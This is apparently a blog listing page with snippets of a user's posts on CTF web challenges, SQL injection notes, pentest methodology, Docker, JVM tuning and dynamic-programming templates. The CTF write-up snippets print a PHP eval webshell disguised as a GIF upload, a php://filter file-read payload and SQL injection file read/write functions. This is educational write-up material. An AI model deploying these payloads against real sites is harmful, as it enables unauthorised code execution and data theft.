- 博客(66)
- 收藏
- 关注
RSS订阅原创 【2023美亚杯】团队赛赛题(无解析版)
提示:请参阅附加资料 Tips: Please refer to additional information (1分)参考 ’ benckwindow10.e01 ’ 回答以下题目 With reference to ‘benckwindow10.e01’ to answer below question 按照时间线分析Ben电脑活动,在2023-09-06 16:58:10时及2023-09-06 16:58:21时,在”Access-Control-Allow-Origin”中显示了哪一个网站?
2023-11-14 14:48:15
4437
1
原创 Web 渗透题(三)
[BJDCTF2020]Easy MD5–ffifdyop+弱类型比较步骤一:ffifdyop 字符串提交两次没反应,上 burpGET /leveldo4.php?password=123 HTTP/1.1Host: 3b74d3ab-4e56-4c99-b522-35a4985ebe8f.node4.buuoj.cn:81Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7
2022-05-20 16:07:16
798
1
原创 Job for mysqld.service failed See “systemctl status mysqld.service“
StackOverFlow 一个回答解决了/etc/init.d/mysql stopsystemctl stop mysqlkillall -KILL mysql mysqld_safe mysqld/etc/init.d/mysql startsystemctl start mysql
2021-12-28 13:57:18
667
原创 WEB 渗透题(二)
[ACTF2020 新生赛]Upload–上传验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下GFI89a<script language="php">eval($_POST['hello'])</script>上传成功,显示Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml直接
2021-12-09 13:57:56
1562
原创 WEB 渗透题(一)
[ACTF2020 新生赛]Include --文件包含思路burp 抓包,发现文件名有点问题。题目和网址的 file 参数,提示这是文件包含的题。GET /?file=flag.php HTTP/1.1Host: 9b09eb46-2433-4403-b582-c5ee23d12378.node4.buuoj.cn:81因此可以构造文件名发包file=php://filter/read=convert.base64-encode/resource=flag.phpGET /?file=ph
2021-12-06 11:04:27
3770
原创 SQL 注入笔记
备忘数据库常用注入参数user():当前数据库用户database():当前数据库名version():当前使用的数据库版本@@datadir:数据库存储数据路径hex() 和 unhex():用于 hex 编码解码ascii():返回字符的ascii码char():把整数转换为对应的字符load_file():以文本方式读取文件,在 Windows 中,路径设置为 \\select xxoo into outfile '路径':权限较高时可直接写文件concat():拼接数据,如 c
2021-12-03 15:26:31
1305
原创 渗透测试思路
步骤信息收集网络层:路由探测、网络设备、管理接口等信息,如 IP 地址/段、DNS 记录、主机层:主机存活、端口服务开放情况、操作系统类型等应用层:web服务器指纹探测、后端挖掘、网站目录、DNS域传送漏洞(手工检测Web应用指纹)渗透测试(若发现问题)网络测试(ARP欺骗、MITM中间人攻击、DDOS攻击)数据有效性(SQL注入、跨站脚本、文件上传、代码注入、缓冲区溢出)认证与会话(旁路绕过、密码找回、目录遍历、文件包含、用户账户猜解如字典攻击、cookie余session草丛、
2021-11-29 14:08:42
3082
原创 终端共享文件的几种方式
GitHub 集合多个API的大文件传输工具transfer.sh**最便捷的方式!**上传文件大小无限制,输入命令直接上传,会返回下载链接。curl --upload-file [FILE] https://transfer.sh/[FILENAME]# 或wget --method PUT --body-file=[FILE] https://transfer.sh/FILENAME.pdf -O - -nv其余操作,参考链接cowTransfer-uploader支持 2GB 文
2021-11-19 17:40:47
906
原创 Docker常用命令
docker search [a]# 搜索[a]的镜像docker pull [b]# 下载镜像[b],可以自由选择docker images# 查看存在的镜像docker image rm <id># 删除镜像docker run -dt --name [n] -p 80:80 --rm [b]# 运行存在的镜像;-dt 后台运行;--name 命名;-p 80:80 将后面的docker容器端口映射到前面的主机端口;--rm 运行完删除容器docker exec
2021-11-11 15:43:16
380
原创 记录一道微软面试题
花了十分钟写一下,其实很简单说一下具体的思路中文权位和节权位一般而言,中文数字都是数字加权位的,比如三十,四百,前者是数字,后者是权位,常见的中文权位有“十”、“百”、“千”、“万”、“亿”等等,除了这些还有兆、京。中文的节权位很重要,暂且叫做 sectionsectionsection,中文计数是以万为小节的,万以下就没有节权位了,万以上的节权位还有亿(万万为亿)、兆(亿亿为兆)、京(兆兆为京)等。有了节权位,每个小节内都是独立计数,再最后乘上节权位,但是小节内部,“十百千”就不能同时出现,所以
2020-08-05 21:06:53
326
1
原创 CLion配置单个编译和单个运行
Clion采用cmake来构建项目并运行,对于单个cpp文件的编译并不支持。网上的一些方法都是通过修改CmakeLists.txt文件来实现的,,每创建一个文件就得修改/添加一次文件,很麻烦。可以使用下面方式配置1、打开偏好设置,添加以下两个细节如下program路径就是g++路径,mac是系统自带的,在/Library/Developer/CommandLineTools/usr/bi...
2020-04-15 22:56:40
2632
1
原创 【解决】WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!
cat ~/.ssh/known_hostsvim ~/.ssh/known_hosts删除ip对应的相关rsa的信息即可
2020-02-13 16:49:24
166
原创 树状数组求逆序对详解
树状数组通用模版class BIT { int n; //这个是外部传进来数组的大小 int[] c; //这个是预处理的树状数组 public BIT(int n) { this.n = n; c = new int[n + 1]; //树状数组一定要开n+1,从1开始,不然的话 ,add...
2020-02-11 18:53:42
880
原创 JVM学习笔记(7):G1垃圾回收器详解与回收性能优化
G1垃圾回收器详解与回收性能优化一、G1的引出1、G1与堆内存 新生代还是老年代,Stop the World是最大的痛点,它们都会产生这个现象,影响系统的运行,所有垃圾回收器的优化都是朝着减少STW的目标去做的,G1便应运而生了。G1可以同时回收新生代和老年代,它的最大特点,就是把Java堆内存拆分为多个大小相等的Region,如图,所以G1的新生代老年代是一种逻辑上的概念了,新生代可能...
2020-02-09 15:33:04
2231
原创 JVM学习笔记(6):新生代与老年代JVM参数优化
三、新生代JVM参数优化1、背景引入 假设我们的背景是每日上亿请求量的一个订单系统,按照每个用户每日访问次数为20次来算,大致有500万个用户(1亿/20),对这五百万个用户,假设付费转化率为10%,也就是有50万人会去下单,我们把这50万订单集中在4个小时的高峰期内,平均每秒钟也就几十个订单,感觉也没什么大的压力,因为几十个订单根本不需要对JVM做太多关注。 但是如果到了双十一这种活动...
2020-02-09 15:17:45
1211
原创 JVM学习笔记(5):CMS垃圾回收器工作原理详解
二、老年代回收容器——CMS1、CMS工作原理 一般老年代我们选择的垃圾回收器是CMS,他采用的是标记清理算法(不是标记整理)。之前提到过Stop the World状态,就是垃圾回收时停止一切线程的工作,如果在这个状态下再去慢慢执行标记清理算法,会导致系统卡死时间过长,所以CMS垃圾回收器采取的是垃圾回收线程和系统工作线程尽量同时执行的模式来处理的。 工作原理:为了避免长时间Stop ...
2020-02-08 17:24:29
1268
1
原创 JVM学习笔记(4):ParNew垃圾回收器工作原理
新生代回收器——ParNew1、工作原理 ParNew垃圾回收器如果一旦在合适的时机执行Minor GC的时候,就会把系统程序的工作线程全部停掉,禁止程序继续运行创建新的对象,然后自己就用多个垃圾回收线程去进行垃圾回收,回收的机制和算法就跟之前说的是一样的。我们启动系统的时候可以指定垃圾回收器,使用-XX:+UseParNewGC选项,只要加入这个选项,JVM启动之后对新生代进行垃圾回收的,...
2020-02-08 17:17:10
421
原创 JVM学习笔记(3):垃圾回收机制详解
JVM学习笔记(3):垃圾回收机制详解一、GC Roots的类型 JVM使用了可达性分析算法,该算法会分析每个对象,看有谁在引用他,一层层判断有没有一个GC Roots,在JVM规范中,局部变量是可以作为GC Roots的,只要一个类的对象被局部变量引用了,那就说明有一个GC Roots,就不能被回收...
2020-02-08 17:11:11
225
原创 JVM学习笔记(2):JVM分代模型与内存参数设置
JVM学习笔记(2):JVM分代模型与内存参数设置一、JVM分代模型1、背景public class Kafka { // 年轻代 public static void main(String[] args) throws InterruptedException { while (true) { loadReplicasFromDis...
2020-02-08 16:54:29
160
原创 JVM学习笔记(1):类加载机制与内存区域
JVM学习笔记一、初识JVM我们写好一份Java代码,要将其部署到线上的机器去运行,就要将其打包成.jar或.war后缀的包,再进行部署。其中关键的一步是**“编译”**,也就是要把.java文件编译成.class字节码文件,有了字节码文件可以通过java命令来启动一个JVM进程,由JVM来负责运行这些字节码文件。所以说,在某个机器上部署某个系统后,一旦启动这个系统,实际上就是启动了JVM。...
2020-02-06 19:56:55
610
原创 docker-maven-plugin详细使用方法
Docker-Maven-Plugin微服务部署有两种方法:手动部署:首先基于源码打包生成jar包(或war包),写个Dockerfile文件,基于基础镜像搞个新镜像,将jar包(或war包)上传至虚拟机并拷贝至JDK容器。(太麻烦了)通过Maven插件自动部署。 这也是企业实际开发中经常使用的方法。Maven插件自动部署步骤写在最前面:该方法有漏洞,容易被黑客远程放入挖矿机镜像,开...
2020-01-21 16:01:04
15831
13
原创 Docker私有仓库详细搭建教程和遇到的坑
7.1 私有仓库搭建与配置公有仓库存储的都是公用镜像,jdk8啊,tomcat、mysql等等,私有仓库存放我们开发的应用,为了能在一个局域网共享这些镜像。(1)拉取私有仓库镜像(此步省略)docker私有仓库本身就是一个镜像,先pull下来docker pull registry(2)根据镜像创建容器docker run -di --name=registry -p 5000:5...
2020-01-21 12:52:19
199
原创 动态规划解题模版:双序列型
动态规划:双序列型双序列型,就是有两个子序列/字符串,每个序列本身是一维的,可以转换为二维dp,序列型开数组开n+1,双序列型也是开n+1。突破口:看串A和串B的最后一个字符是否匹配,是否需要串A/串B的最后一个字符,来缩减规模。两种类型:计数型:情况1+情况2+…以及最值型min/max{情况1,情况2…}初始条件:要特别当心空串的处理。1、LintCode 77 Longest Co...
2020-01-17 12:42:28
364
原创 动态规划解题模版:区间型
动态规划:区间型背景:给定一个序列或字符串要进行一些操作,最后一步要将序列或字符串去头、去尾,区间[i,j]变为区间[i+1,j-1],力扣上面的最长回文子串就是这样子操作。区间型dp一般用dp[i] [j],i代表左端点,j代表右端点,若有其他维度可再添加,若两个端点之间存在联系,则可再压缩空间。区间型dp不开n+1,开n,区间型dp要按照长度去算。不能按照i,要按照j-i。1、LintC...
2020-01-17 12:36:46
553
1
原创 动态规划解题模版:背包型
动态规划:背包型数组开n+1,背包关键就是看最后一步。1、LintCode 92: Backpack【问题】在n个物品中挑选若干物品装入背包,最多能装多满?假设背包的大小为m,每个物品的大小为A[i]【分析】从最后一步出发,最后一个物品放还是不放。有两种情况前n-1个物品能拼出重量 w,那么n个物品也能拼出重量w前n-1个物品能拼出重量 w - A[n-1],再加上最后一个物品 A[...
2020-01-17 12:32:04
270
原创 动态规划解题模版:博弈型
动态规划:博弈型博弈型dp一般从第一步分析,而不是最后一步,需要开n+11、LintCode 394 Coins in a Line【问题】有 n 个硬币排成一条线。两个参赛者轮流从右边依次拿走 1 或 2 个硬币,直到没有硬币为止。拿到最后一枚硬币的人获胜。请判定 先手玩家必胜还是必败?【分析】从第一步开始,一开始有n个硬币,A可以拿一个或两个硬币,这样B则对应拿n-1个或n-2个硬币,...
2020-01-17 12:26:50
260
原创 动态规划解题模版:划分型
动态规划:划分型划分型动态规划就是给定长度为N的字符串,需要划分成若干段,段数不限,每一段满足一定的性质。在学校oj中做过的书本分发、漆狗屋这种就属于划分型。开数组也是开n+11、Lintcode 512 解码方法【问题】有一个消息包含A-Z通过以下规则编码:‘A’ -> 1,‘B’ -> 2…‘Z’ -> 26,现在给你一个加密过后的消息,问有几种解码的方式。输入: "...
2020-01-17 12:25:31
448
原创 动态规划解题模版:序列型
序列型dp就是序列+状态,直接看几个例子。1、LintCode 515 Paint House【问题】这里有n个房子在一列直线上,现在我们需要给房屋染色,分别有红色蓝色和绿色。每个房屋染不同的颜色费用也不同,你需要设计一种染色方案使得相邻的房屋颜色不同,并且费用最小,返回最小的费用。费用通过一个nx3 的矩阵给出,比如cost[0][0]表示房屋0染红色的费用,cost[1][2]表示房屋1染...
2020-01-17 12:20:19
427
原创 动态规划解题模版:坐标型
动态规划解题模版::坐标型坐标型dp一般都是给定网格、序列,来求满足某种性质的最大值、最小值。开数组时,f[i]代表以ai 结尾的满足条件的子序列,f[i] [j]代表以i、j结尾的满足条件的某种情况。做题思路:从最后一步出发思考,确定状态分析子问题是什么得到状态转移方程确定初始条件与边界条件编程1、Lintcode 114 UniquePaths【问题】有一个机器人的位于一...
2020-01-17 12:09:11
352
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人